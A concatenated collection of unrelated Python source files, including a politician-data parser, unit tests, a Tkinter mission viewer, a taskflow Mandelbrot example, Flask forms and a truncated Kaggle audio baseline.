entity.context["updated_at"] = lastmod.isoformat()
entity.add("name", data.pop("name", None))
entity.add("alias", data.pop("sort_name", None))
for other in data.pop("other_names", []):
entity.add("alias", other.get("name"))
for link in data.pop("links", []):
url = link.get("url")
if link.get("note") in ("website", "blog", "twitter", "facebook"):
entity.add("website", url)
# elif "Wikipedia (" in link.get("note") and "wikipedia.org" in url:
# entity.add("wikipediaUrl", url)
# elif "wikipedia" in link.get("note") and "wikipedia.org" in url:
# entity.add("wikipediaUrl", url)
# else:
# context.log.info("Unknown URL", url=url, note=link.get("note"))
for ident in data.pop("identifiers", []):
identifier = ident.get("identifier")
scheme = ident.get("scheme")
if scheme == "wikidata" and identifier.startswith("Q"):
entity.add("wikidataId", identifier)
# from followthemoney.dedupe import Judgement
# context.resolver.decide(
# entity.id,
# identifier,
# judgement=Judgement.POSITIVE,
# user="everypolitician",
# )
# else:
# pprint(ident)
for contact_detail in data.pop("contact_details", []):
value = contact_detail.get("value")
if "email" == contact_detail.get("type"):
entity.add("email", h.clean_emails(value))
if "phone" == contact_detail.get("type"):
entity.add("phone", h.clean_phones(value))
def parse_person(context, data, country, entities, lastmod):
person_id = data.pop("id", None)
person = context.make("Person")
person.id = context.make_slug(person_id)
person.add("nationality", country)
name = data.get("name")
if name is None or name.lower().strip() in ("unknown",):
return
parse_common(context, person, data, lastmod)
person.add("gender", h.clean_gender(data.pop("gender", None)))
person.add("title", data.pop("honorific_prefix", None))
person.add("title", data.pop("honorific_suffix", None))
person.add("firstName", data.pop("given_name", None))
person.add("lastName", data.pop("family_name", None))
person.add("fatherName", data.pop("patronymic_name", None))
person.add("birthDate", data.pop("birth_date", None))
person.add("deathDate", data.pop("death_date", None))
person.add("email", h.clean_emails(data.pop("email", None)))
person.add("notes", data.pop("summary", None))
person.add("topics", "role.pep")
if h.check_person_cutoff(person):
return
# data.pop("image", None)
# data.pop("images", None)
# if len(data):
# pprint(data)
context.emit(person, target=True, unique=True)
entities[person_id] = person.id
def parse_organization(context, data, country, entities, lastmod):
org_id = data.pop("id", None)
org_id = context.lookup_value("org_id", org_id, org_id)
if org_id is None:
return
classification = data.pop("classification", None)
organization = context.make("Organization")
if classification == "legislature":
organization = context.make("PublicBody")
organization.add("topics", "gov.national")
elif classification == "party":
organization.add("topics", "pol.party")
else:
context.log.error(
"Unknown org type",
entity=organization,
field="classification",
value=classification,
)
organization.id = context.make_slug(country, org_id)
if organization.id is None:
context.log.warning(
"No ID for organization",
entity=organization,
country=country,
org_id=org_id,
)
return
organization.add("country", country)
parse_common(context, organization, data, lastmod)
organization.add("legalForm", data.pop("type", None))
# data.pop("image", None)
# data.pop("images", None)
# data.pop("seats", None)
# if len(data):
# pprint(data)
context.emit(organization)
entities[org_id] = organization.id
def parse_membership(context, data, entities, events):
person_id = entities.get(data.pop("person_id", None))
organization_id = entities.get(data.pop("organization_id", None))
if person_id and organization_id:
period_id = data.get("legislative_period_id")
membership = context.make("Membership")
membership.id = context.make_id(period_id, person_id, organization_id)
membership.add("member", person_id)
membership.add("organization", organization_id)
membership.add("role", data.pop("role", None))
membership.add("startDate", data.get("start_date"))
membership.add("endDate", data.get("end_date"))
period = events.get(period_id, {})
membership.add("startDate", period.get("start_date"))
membership.add("endDate", period.get("end_date"))
membership.add("description", period.get("name"))
for source in data.get("sources", []):
membership.add("sourceUrl", source.get("url"))
# pprint(data)
context.emit(membership)
on_behalf_of_id = entities.get(data.pop("on_behalf_of_id", None))
if person_id and on_behalf_of_id:
membership = context.make("Membership")
membership.id = context.make_id(person_id, on_behalf_of_id)
membership.add("member", person_id)
membership.add("organization", on_behalf_of_id)
for source in data.get("sources", []):
membership.add("sourceUrl", source.get("url"))
context.emit(membership)
| StarcoderdataPython |
5033206 | <filename>tests/model/test_pdb.py
from __future__ import absolute_import, division, print_function
import ispyb.model.pdb
import mock
import pytest
def test_pdb_values_are_immutable():
P = ispyb.model.pdb.PDB()
with pytest.raises(AttributeError):
P.name = "test"
with pytest.raises(AttributeError):
P.rawfile = "test"
with pytest.raises(AttributeError):
P.code = "test"
def test_pdb_values_can_be_read_back():
P = ispyb.model.pdb.PDB(
name=mock.sentinel.name, rawfile=mock.sentinel.rawfile, code=mock.sentinel.code
)
assert P.name == mock.sentinel.name
assert P.rawfile == mock.sentinel.rawfile
assert P.code == mock.sentinel.code
P = ispyb.model.pdb.PDB()
assert P.name is None
assert P.rawfile is None
assert P.code is None
P = ispyb.model.pdb.PDB(name="", rawfile="", code="")
assert P.name == ""
assert P.rawfile is None
assert P.code is None
def test_pdb_object_representation():
P = ispyb.model.pdb.PDB(name="somename", rawfile="x" * 100, code="somecode")
assert repr(P) == "<PDB somename>"
assert "somename" in str(P)
assert "100 bytes" in str(P)
assert "xxxxxxxxx" not in str(P)
assert "somecode" in str(P)
| StarcoderdataPython |
9749046 | CONNECTIONADDRESS = "tcp://127.0.0.1:9000"
AGENT_INFO_PATH = './agent_cm.log'
UUIDPATH = './uuid.txt' | StarcoderdataPython |
249033 | from aiflearn.algorithms.inprocessing.adversarial_debiasing import AdversarialDebiasing
from aiflearn.algorithms.inprocessing.art_classifier import ARTClassifier
from aiflearn.algorithms.inprocessing.prejudice_remover import PrejudiceRemover
from aiflearn.algorithms.inprocessing.meta_fair_classifier import MetaFairClassifier | StarcoderdataPython |
5173065 | # -*- coding:utf-8 -*-
from src.Client.Conf.config import *
from src.Client.SystemTools.ConfFileRead import configFileRead
class ShowMission():
"""
搜索栏显示任务GUI部分。
"""
def __init__(self):
self.windowTitleVar = tkinter.StringVar()
self.missionIdVar = tkinter.StringVar()
self.missionNameVar = tkinter.StringVar()
self.missionRangeVar = tkinter.StringVar()
self.missionNextTimeVar = tkinter.StringVar()
self.missionStateVar = tkinter.StringVar()
self.missionLoopTimeVar = tkinter.StringVar()
self.missionStateVar = tkinter.StringVar()
self.language()
pass
def language(self):
"""
语言切换,暂时不做外部调用(即每次重启生效)
:return:
"""
languageType = configFileRead.ConfigFileRead(fileName='./conf/user.ini').readFile("LANGUAGE", 'language')
if languageType == 'CN':
self.windowTitleVar.set('任务详情')
self.missionIdVar.set('任务id: ')
self.missionNameVar.set('任务书名: ')
self.missionRangeVar.set('任务范围: ')
self.missionNextTimeVar.set('下次任务时间: ')
self.missionStateVar.set('任务状态: ')
self.missionLoopTimeVar.set('剩余迭代次数: ')
self.missionStateVar.set('完成状态: ')
elif languageType == 'EN':
self.windowTitleVar.set('mission detail')
self.missionIdVar.set('mission id: ')
self.missionNameVar.set('mission name: ')
self.missionRangeVar.set('mission range: ')
self.missionNextTimeVar.set('next time: ')
self.missionStateVar.set('mission state: ')
self.missionLoopTimeVar.set('remain loop time: ')
self.missionStateVar.set('mission state: ')
else:
self.windowTitleVar.set('任务详情')
self.missionIdVar.set('任务id: ')
self.missionNameVar.set('任务书名: ')
self.missionRangeVar.set('任务范围: ')
self.missionNextTimeVar.set('下次任务时间: ')
self.missionStateVar.set('任务状态: ')
self.missionLoopTimeVar.set('剩余迭代次数: ')
self.missionStateVar.set('完成状态: ')
def window(self, result):
showWindow = tkinter.Toplevel()
screenWidth = showWindow.winfo_screenwidth()
screenHeight = showWindow.winfo_screenheight()
showWindow.geometry(
'300x250+' + str(int((screenWidth - 300) / 2)) + '+' + str(int((screenHeight - 250) / 2)))
showWindow.resizable(width=False, height=False)
showWindow.title(self.windowTitleVar.get())
showWindow.iconbitmap('images/icon.ico')
# 显示任务
showMission = self.missionIdVar.get() + str(result['missionId'])
missiondLabel = tkinter.Label(showWindow, text=showMission)
missiondLabel.place(x=30, y=20, anchor='nw')
# 显示书名
showBookName = self.missionNameVar.get() + str(result['bookName'])
bookNameLabel = tkinter.Label(showWindow, text=showBookName)
bookNameLabel.place(x=30, y=50, anchor='nw')
# 显示任务范围
showMissionRange = self.missionRangeVar.get() + str(result['missionRange'])
missionRangeLabel = tkinter.Label(showWindow, text=showMissionRange)
missionRangeLabel.place(x=30, y=80, anchor='nw')
# 显示下次任务时间
showNextTime = self.missionNextTimeVar.get() + str(result['nextTime'])
nextTimeLabel = tkinter.Label(showWindow, text=showNextTime)
nextTimeLabel.place(x=30, y=110, anchor='nw')
# 显示任务状态
showMissionState = self.missionStateVar.get() + str(result['state'])
stateMissionLabel = tkinter.Label(showWindow, text=showMissionState)
stateMissionLabel.place(x=30, y=140, anchor='nw')
# 显示剩余迭代次数
showLoopTime = self.missionLoopTimeVar.get() + str(result['loopTime'])
loopTimeLabel = tkinter.Label(showWindow, text=showLoopTime)
loopTimeLabel.place(x=30, y=170, anchor='nw')
# 显示完成状态
showIsFinish = self.missionStateVar.get() + str(result['isFinish'])
isFinishLabel = tkinter.Label(showWindow, text=showIsFinish)
isFinishLabel.place(x=30, y=200, anchor='nw')
| StarcoderdataPython |
4864469 | import re
def solution(s):
return ' '.join(re.findall('[a-zA-Z][^A-Z]*', s))
print(solution('camelCasing')) | StarcoderdataPython |
5095397 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import math
import os
import sys
top_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),
os.pardir,
os.pardir))
sys.path.insert(0, top_dir)
from six.moves import range as compat_range
from taskflow import engines
from taskflow.engines.worker_based import worker
from taskflow.patterns import unordered_flow as uf
from taskflow import task
from taskflow.utils import threading_utils
# INTRO: This example walks through a workflow that will in parallel compute
# a mandelbrot result set (using X 'remote' workers) and then combine their
# results together to form a final mandelbrot fractal image. It shows a usage
# of taskflow to perform a well-known embarrassingly parallel problem that has
# the added benefit of also being an elegant visualization.
#
# NOTE(harlowja): this example simulates the expected larger number of workers
# by using a set of threads (which in this example simulate the remote workers
# that would typically be running on other external machines).
#
# NOTE(harlowja): to have it produce an image run (after installing pillow):
#
# $ python taskflow/examples/wbe_mandelbrot.py output.png
BASE_SHARED_CONF = {
'exchange': 'taskflow',
}
WORKERS = 2
WORKER_CONF = {
# These are the tasks the worker can execute, they *must* be importable,
# typically this list is used to restrict what workers may execute to
# a smaller set of *allowed* tasks that are known to be safe (one would
# not want to allow all python code to be executed).
'tasks': [
'%s:MandelCalculator' % (__name__),
],
}
ENGINE_CONF = {
'engine': 'worker-based',
}
# Mandelbrot & image settings...
IMAGE_SIZE = (512, 512)
CHUNK_COUNT = 8
MAX_ITERATIONS = 25
class MandelCalculator(task.Task):
def execute(self, image_config, mandelbrot_config, chunk):
"""Returns the number of iterations before the computation "escapes".
Given the real and imaginary parts of a complex number, determine if it
is a candidate for membership in the mandelbrot set given a fixed
number of iterations.
"""
# Parts borrowed from (credit to <NAME> and <NAME>).
#
# http://nbviewer.ipython.org/gist/harrism/f5707335f40af9463c43
def mandelbrot(x, y, max_iters):
c = complex(x, y)
z = 0.0j
for i in compat_range(max_iters):
z = z * z + c
if (z.real * z.real + z.imag * z.imag) >= 4:
return i
return max_iters
min_x, max_x, min_y, max_y, max_iters = mandelbrot_config
height, width = image_config['size']
pixel_size_x = (max_x - min_x) / width
pixel_size_y = (max_y - min_y) / height
block = []
for y in compat_range(chunk[0], chunk[1]):
row = []
imag = min_y + y * pixel_size_y
for x in compat_range(0, width):
real = min_x + x * pixel_size_x
row.append(mandelbrot(real, imag, max_iters))
block.append(row)
return block
def calculate(engine_conf):
# Subdivide the work into X pieces, then request each worker to calculate
# one of those chunks and then later we will write these chunks out to
# an image bitmap file.
# And unordered flow is used here since the mandelbrot calculation is an
# example of an embarrassingly parallel computation that we can scatter
# across as many workers as possible.
flow = uf.Flow("mandelbrot")
# These symbols will be automatically given to tasks as input to their
# execute method, in this case these are constants used in the mandelbrot
# calculation.
store = {
'mandelbrot_config': [-2.0, 1.0, -1.0, 1.0, MAX_ITERATIONS],
'image_config': {
'size': IMAGE_SIZE,
}
}
# We need the task names to be in the right order so that we can extract
# the final results in the right order (we don't care about the order when
# executing).
task_names = []
# Compose our workflow.
height, _width = IMAGE_SIZE
chunk_size = int(math.ceil(height / float(CHUNK_COUNT)))
for i in compat_range(0, CHUNK_COUNT):
chunk_name = 'chunk_%s' % i
task_name = "calculation_%s" % i
# Break the calculation up into chunk size pieces.
rows = [i * chunk_size, i * chunk_size + chunk_size]
flow.add(
MandelCalculator(task_name,
# This ensures the storage symbol with name
# 'chunk_name' is sent into the tasks local
# symbol 'chunk'. This is how we give each
# calculator its own correct sequence of rows
# to work on.
rebind={'chunk': chunk_name}))
store[chunk_name] = rows
task_names.append(task_name)
# Now execute it.
eng = engines.load(flow, store=store, engine_conf=engine_conf)
eng.run()
# Gather all the results and order them for further processing.
gather = []
for name in task_names:
gather.extend(eng.storage.get(name))
points = []
for y, row in enumerate(gather):
for x, color in enumerate(row):
points.append(((x, y), color))
return points
def write_image(results, output_filename=None):
print("Gathered %s results that represents a mandelbrot"
" image (using %s chunks that are computed jointly"
" by %s workers)." % (len(results), CHUNK_COUNT, WORKERS))
if not output_filename:
return
# Pillow (the PIL fork) saves us from writing our own image writer...
try:
from PIL import Image
except ImportError as e:
# To currently get this (may change in the future),
# $ pip install Pillow
raise RuntimeError("Pillow is required to write image files: %s" % e)
# Limit to 255, find the max and normalize to that...
color_max = 0
for _point, color in results:
color_max = max(color, color_max)
# Use gray scale since we don't really have other colors.
img = Image.new('L', IMAGE_SIZE, "black")
pixels = img.load()
for (x, y), color in results:
if color_max == 0:
color = 0
else:
color = int((float(color) / color_max) * 255.0)
pixels[x, y] = color
img.save(output_filename)
def create_fractal():
logging.basicConfig(level=logging.ERROR)
# Setup our transport configuration and merge it into the worker and
# engine configuration so that both of those use it correctly.
shared_conf = dict(BASE_SHARED_CONF)
shared_conf.update({
'transport': 'memory',
'transport_options': {
'polling_interval': 0.1,
},
})
if len(sys.argv) >= 2:
output_filename = sys.argv[1]
else:
output_filename = None
worker_conf = dict(WORKER_CONF)
worker_conf.update(shared_conf)
engine_conf = dict(ENGINE_CONF)
engine_conf.update(shared_conf)
workers = []
worker_topics = []
print('Calculating your mandelbrot fractal of size %sx%s.' % IMAGE_SIZE)
try:
# Create a set of workers to simulate actual remote workers.
print('Running %s workers.' % (WORKERS))
for i in compat_range(0, WORKERS):
worker_conf['topic'] = 'calculator_%s' % (i + 1)
worker_topics.append(worker_conf['topic'])
w = worker.Worker(**worker_conf)
runner = threading_utils.daemon_thread(w.run)
runner.start()
w.wait()
workers.append((runner, w.stop))
# Now use those workers to do something.
engine_conf['topics'] = worker_topics
results = calculate(engine_conf)
print('Execution finished.')
finally:
# And cleanup.
print('Stopping workers.')
while workers:
r, stopper = workers.pop()
stopper()
r.join()
print("Writing image...")
write_image(results, output_filename=output_filename)
if __name__ == "__main__":
create_fractal()
| StarcoderdataPython |
4984801 | ################################################################################
# Copyright 2018 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
################################################################################
import lib.fhepy as fhe
import random
import operator
def CheckResult(m, op, result):
return op(m[0], m[1]) == result
pubkey, prikey = fhe.KeyGen()
m = [random.randint(0,1), random.randint(0,1)]
c0, c1 = fhe.Encrypt(m[0], prikey), fhe.Encrypt(m[1], prikey)
# AND Gate
c = c0 & c1
result = c.Decrypt(prikey)
print("AND gate : " + str(CheckResult(m, operator.__and__, result)))
# XOR Gate
c = c0 ^ c1
result = c.Decrypt(prikey)
print("XOR gate : " + str(CheckResult(m, operator.__xor__, result)))
# OR Gate
c = c0 | c1
result = c.Decrypt(prikey)
print("OR gate : " + str(CheckResult(m, operator.__or__, result)))
# NOT Complement
c = ~c0
result = c.Decrypt(prikey)
print("NOT gate : " + str(result != m[0]))
# NAND Gate
c = ~(c0 & c1)
result = c.Decrypt(prikey)
print("NAND gate : " + str(not CheckResult(m, operator.__and__, result)))
| StarcoderdataPython |
5026486 | <reponame>SunYanCN/PaddleNLP
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import os
import unittest
from paddlenlp.utils.log import logger
from paddlenlp.transformers import AutoTokenizer
from paddlenlp.datasets import load_dataset
from faster_tokenizer import ErnieFasterTokenizer, models
logger.logger.setLevel('ERROR')
class TestWordpiece(unittest.TestCase):
def set_flag(self):
self.use_faster_wordpiece = False
self.use_faster_wordpiece_with_pretokenization = False
def setUp(self):
self.max_seq_length = 128
self.wordpiece_tokenizer = AutoTokenizer.from_pretrained("ernie-1.0")
ernie_vocab = self.wordpiece_tokenizer.vocab.token_to_idx
self.set_flag()
self.faster_wordpiece_tokenizer = ErnieFasterTokenizer(
ernie_vocab,
max_sequence_len=self.max_seq_length,
use_faster_wordpiece=self.use_faster_wordpiece,
use_faster_wordpiece_with_pretokenization=self.
use_faster_wordpiece_with_pretokenization)
self.dataset = [
example["sentence"]
for example in load_dataset(
'clue', 'tnews', splits=['train'])
]
def test_encode(self):
for sentence in self.dataset:
wordpiece_result = self.wordpiece_tokenizer(
sentence, max_length=self.max_seq_length)
expected_input_ids = wordpiece_result['input_ids']
expected_token_type_ids = wordpiece_result['token_type_ids']
faster_wordpiece_result = self.faster_wordpiece_tokenizer.encode(
sentence)
actual_input_ids = faster_wordpiece_result.ids
actual_token_type_ids = faster_wordpiece_result.type_ids
self.assertEqual(expected_input_ids, actual_input_ids)
self.assertEqual(expected_token_type_ids, actual_token_type_ids)
def test_get_offset_mapping(self):
for i, sentence in enumerate(self.dataset):
wordpiece_result = self.wordpiece_tokenizer(
sentence,
max_length=self.max_seq_length,
return_offsets_mapping=True)
expected_offset_mapping = wordpiece_result['offset_mapping']
faster_wordpiece_result = self.faster_wordpiece_tokenizer.encode(
sentence)
actual_offset_mapping = faster_wordpiece_result.offsets
self.assertEqual(expected_offset_mapping, actual_offset_mapping)
class TestFasterWordpiece(TestWordpiece):
def set_flag(self):
self.use_faster_wordpiece = True
self.use_faster_wordpiece_with_pretokenization = False
class TestFasterWordpieceWithPretokenization(TestWordpiece):
def set_flag(self):
self.use_faster_wordpiece = True
self.use_faster_wordpiece_with_pretokenization = True
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
5167647 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Utility functions to work with ROOT and rootpy.
* ROOT: https://root.cern.ch
* rootpy: http://www.rootpy.org/
"""
from .convert import *
| StarcoderdataPython |
1856535 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021/2/3 2:30 下午
# @File : setup.py.py
# @Author: johnson
# @Contact : github: johnson7788
# @Desc :
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="google_trans_new",
version="1.1.9",
author="LuShan",
author_email="xx",
description="xx",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/xxx",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.7',
) | StarcoderdataPython |
5102101 | # -*- coding: utf-8 -*-
# @Auther: Verf
# @Emal: <EMAIL>
import nvimclient
if __name__ == '__main__':
nvimclient.cli()
| StarcoderdataPython |
3261823 | import os
def get_file_dirs_with_suffix(directory_of_interest, suffix):
"""
Gets all of the directories that have a file named with the given suffix
:param directory_of_interest: string path of the directory to search
:param suffix: string end of file name for which to look
:return: all of the directory paths that contain a file with the suffix of interest
"""
directory_list = set()
# directory contents, as returned from os.walk is a tuple: (dir_name, [directories], [filenames])
for directory_contents in os.walk(directory_of_interest):
file_name_list = directory_contents[2]
parent_directory = directory_contents[0]
for file_name in file_name_list:
if file_name.endswith(suffix):
directory_list.add(parent_directory)
return directory_list
def main(args):
for dir in get_file_dirs_with_suffix(args.directory, args.suffix):
print(dir)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Searches a directory for files ending'
' in a given suffix.')
parser.add_argument('suffix', type=str, help='file suffix for which to search')
parser.add_argument('directory', type=str, help='directory in which to search')
args = parser.parse_args()
main(args)
| StarcoderdataPython |
8075749 | import os
from random import sample
import matplotlib.pyplot as plt
import requests
from imageio import imread
# Global model settings
INPUT_DATA_DIR = 'Data/Images/'
INPUT_SHAPE = (224, 224, 3)
# All available training images
files = [file for file in os.listdir(INPUT_DATA_DIR) if file.endswith(".jpg")]
file_paths = [INPUT_DATA_DIR + file for file in files]
sample_path = sample(files, 1)[0]
img = imread(INPUT_DATA_DIR + sample_path)
# Send data as list to TF serving via json dump
request_url = 'http://localhost:5000/grad-cam'
request_body = {"label": sample_path, "image": img.tolist()}
request_headers = {"content-type": "application/json"}
response = requests.post(request_url, json=request_body, headers=request_headers)
heatmap = response.json()['heatmap']
plt.imshow(heatmap)
plt.show()
| StarcoderdataPython |
8183024 | import os
import shutil
def cp_same_dif_files(source1, source2, destination_same, destination_dif,file_types):
# This function compares files in source1 and source2 and copies duplicate (same) files
#so destination_same directory has files that are the same in source1 and source2
# while destination_dif has subdirectories of files that are the different in the two sources
# source1 is one directory want to compare files in
# source2 is other directory want to compare files in
# destination_same is where complete set of non-duplicate, same files will end up
# destination_dif is where the files that are different between sources will end up,
# in destination_dif/source1 and destination_dif/source2 specifically
# file_types are the types of files want moved to destination directory
files1 = os.listdir(source1)
files2 = os.listdir(source2)
files3 = os.listdir(destination_same)
if not os.path.isdir(destination_dif+'/source1'):
os.makedirs(destination_dif+'/source1')
if not os.path.isdir(destination_dif+'/source2'):
os.makedirs(destination_dif+'/source2')
files4 = os.listdir(destination_dif)
if files1 == files2:
print("directories contain the same files; no files copied; focus on one of source directories")
elif files1 != files2:
print("directories do not contain the same files")
#Only look at the images in files1 but not in files2
dif_files_temp = [x for x in files1 if x not in files2]
# Only dealing with file types of interest
dif_files_1_temp = [j for j in dif_files_temp if any (k in j for k in file_types)]
#Ensure files in source1 not already in destination folder
dif_files_1 = [x for x in dif_files_1_temp if x not in files4]
#Copy files only found in files1 into destination_dif1
for i in dif_files_1:
shutil.copy2 (source1+i, destination_dif+'/source1/'+i)
#Only look at the images that are in files2 but not in files1
dif_files_temp = [x for x in files2 if x not in files1]
dif_files_2_temp = [j for j in dif_files_temp if any (k in j for k in file_types)]
dif_files_2 = [x for x in dif_files_2_temp if x not in files4]
for i in dif_files_2:
shutil.copy2 (source2+i, destination_dif+'/source2/'+i)
# Move images that are same in both folders
same_files_temp = [x for x in files1 if x in files2]
same_files_temp_2 = [j for j in same_files_temp if any (k in j for k in file_types)]
same_files = [x for x in same_files_temp_2 if x not in files3]
for i in same_files:
shutil.copy2 (source1+i, destination_same+i)
# Specify directories want to compare and where want files to end up
# Note the structure of this list path_groups. This structure is chosen so it can
# be inptu into a for loop at the end of this script
path_groups = [['/Users/dtaniguchi/Desktop/Test_images/Ciliate1/',#folder_1 for comparison
'/Users/dtaniguchi/Desktop/Test_images/Ciliate2/',#folder_2 for comparison
'/Users/dtaniguchi/Desktop/Test_images/Ciliate_Final/',#destination for files that are the same
'/Users/dtaniguchi/Desktop/Test_images/ciliate_dif'],#destination for files that are the different
['/Users/dtaniguchi/Desktop/Test_images/Lpoly1/',#folder_1 for comparison
'/Users/dtaniguchi/Desktop/Test_images/Lpoly2/',#folder_2 for comparison
'/Users/dtaniguchi/Desktop/Test_images/Lpoly_Final/',#destination for same
'/Users/dtaniguchi/Desktop/Test_images/Lpoly_dif']] #destination different
# Specify file types want to look at actually move around
file_types = ['jpg']
# Run function in a for loop (hence the structure of the list path_groups above)
for paths in path_groups:
cp_same_dif_files(paths[0],paths[1],paths[2],paths[3],file_types)
| StarcoderdataPython |
8094101 | <filename>flask_app/flask_server/forms.py<gh_stars>1-10
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from flask_login import current_user
from wtforms import StringField, PasswordField, SubmitField, BooleanField, TextAreaField, SelectField, IntegerField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from flask_server.models import User
class RegistrationForm(FlaskForm):
username = StringField('Username',
validators=[DataRequired(), Length(min=2, max=20)])
email = StringField('Email',
validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('<PASSWORD> Password',
validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Sign Up')
def validate_username(self, username):
user=User.query.filter_by(username= username.data).first()
if user:
raise ValidationError('That username is taken. Please choose a different one')
def validate_email(self, email):
user=User.query.filter_by(email= email.data).first()
if user:
raise ValidationError('That email is taken. Please choose a different one')
class LoginForm(FlaskForm):
email = StringField('Email',
validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember Me')
submit = SubmitField('Login')
class UpdateAccountForm(FlaskForm):
username = StringField('Username',
validators=[DataRequired(), Length(min=2, max=20)])
email = StringField('Email',
validators=[DataRequired(), Email()])
picture = FileField('Update Profile Picture', validators=[FileAllowed(['jpg', 'png'])])
submit = SubmitField('update')
def validate_username(self, username):
if username.data!= current_user.username:
user=User.query.filter_by(username= username.data).first()
if user:
raise ValidationError('That username is taken. Please choose a different one')
def validate_email(self, email):
if email.data!= current_user.email:
user=User.query.filter_by(email= email.data).first()
if user:
raise ValidationError('That email is taken. Please choose a different one')
class PostForm(FlaskForm):
title = StringField('Title of prediction', validators=[DataRequired()])
content = TextAreaField('Description of prediction', validators=[DataRequired()])
picture = FileField('File (.tif) containing satellite data, MSI, CWI and LAI all in one',
validators=[FileAllowed(['tif'])])
country = SelectField('Country of prediction', choices = [('Guinea', 'Guinea'), ('Congo', 'Congo')], validators=[DataRequired()])
color1 = StringField('', default='#064518', validators=[DataRequired()], render_kw={'readonly': True})
color2 = StringField('', default='#DEDC93', validators=[DataRequired()], render_kw={'readonly': True})
color3 = StringField('', default='#A3A39B', validators=[DataRequired()], render_kw={'readonly': True})
submit= SubmitField('Post')
| StarcoderdataPython |
69348 | <reponame>seryafarma/gaphor
from gaphor import UML
from gaphor.core.eventmanager import EventManager
from gaphor.core.modeling import ElementFactory
from gaphor.storage.verify import orphan_references
def test_verifier():
factory = ElementFactory(EventManager())
c = factory.create(UML.Class)
p = factory.create(UML.Property)
c.ownedAttribute = p
assert not orphan_references(factory)
# Now create a separate item, not part of the factory:
m = UML.Comment(id="acd123")
m.annotatedElement = c
assert m in c.ownedComment
assert orphan_references(factory)
| StarcoderdataPython |
9660467 | # ==================================================================================
# Baseline Model
# date : 2019/05/05
# reference : https://www.kaggle.com/mhiro2/simple-2d-cnn-classifier-with-pytorch
# comment : [change point] epoch {80 > 400}
# ==================================================================================
import gc
import os
import random
import time
from logging import getLogger, Formatter, FileHandler, StreamHandler, INFO, DEBUG
from pathlib import Path
from psutil import cpu_count
from functools import wraps, partial
from tqdm import tqdm
from fastprogress import master_bar, progress_bar
import numpy as np
import pandas as pd
from numba import jit
from PIL import Image
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.optim import Adam
from torch.optim.lr_scheduler import CosineAnnealingLR
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import transforms
# ================= #
# paramas section #
# ================= #
# kaggleのkernelで実行する場合は以下
# IS_KERNEL = True
IS_KERNEL = False
VERSION = "0000" if IS_KERNEL else os.path.basename(__file__)[0:4]
IMAGE_VERSION = "1000"
FOLD_NUM = 5
ROOT_PATH = Path("..") if IS_KERNEL else Path(__file__).parents[1]
DataLoader = partial(DataLoader, num_workers=cpu_count())
SEED = 1116
# 基礎数値他
SAMPLING_RATE = 44100 # 44.1[kHz]
SAMPLE_DURATION = 2 # 2[sec]
N_MEL = 128 # spectrogram y axis size
# =============== #
# util function #
# =============== #
def get_logger(is_torch=False):
return getLogger("torch" + VERSION) if is_torch else getLogger(VERSION)
def stop_watch(*dargs, **dkargs):
def decorator(func):
@wraps(func)
def wrapper(*args, **kargs):
method_name = dargs[0]
start = time.time()
get_logger().info("[Start] {}".format(method_name))
result = func(*args, **kargs)
elapsed_time = int(time.time() - start)
minits, sec = divmod(elapsed_time, 60)
hour, minits = divmod(minits, 60)
get_logger().info("[Finish] {}: [elapsed_time] {:0>2}:{:0>2}:{:0>2}".format(method_name, hour, minits, sec))
return result
return wrapper
return decorator
# ======================= #
# preprocessing section #
# ======================= #
# ref : https://www.kaggle.com/daisukelab/creating-fat2019-preprocessed-data
# >> data select section
def select_train_data():
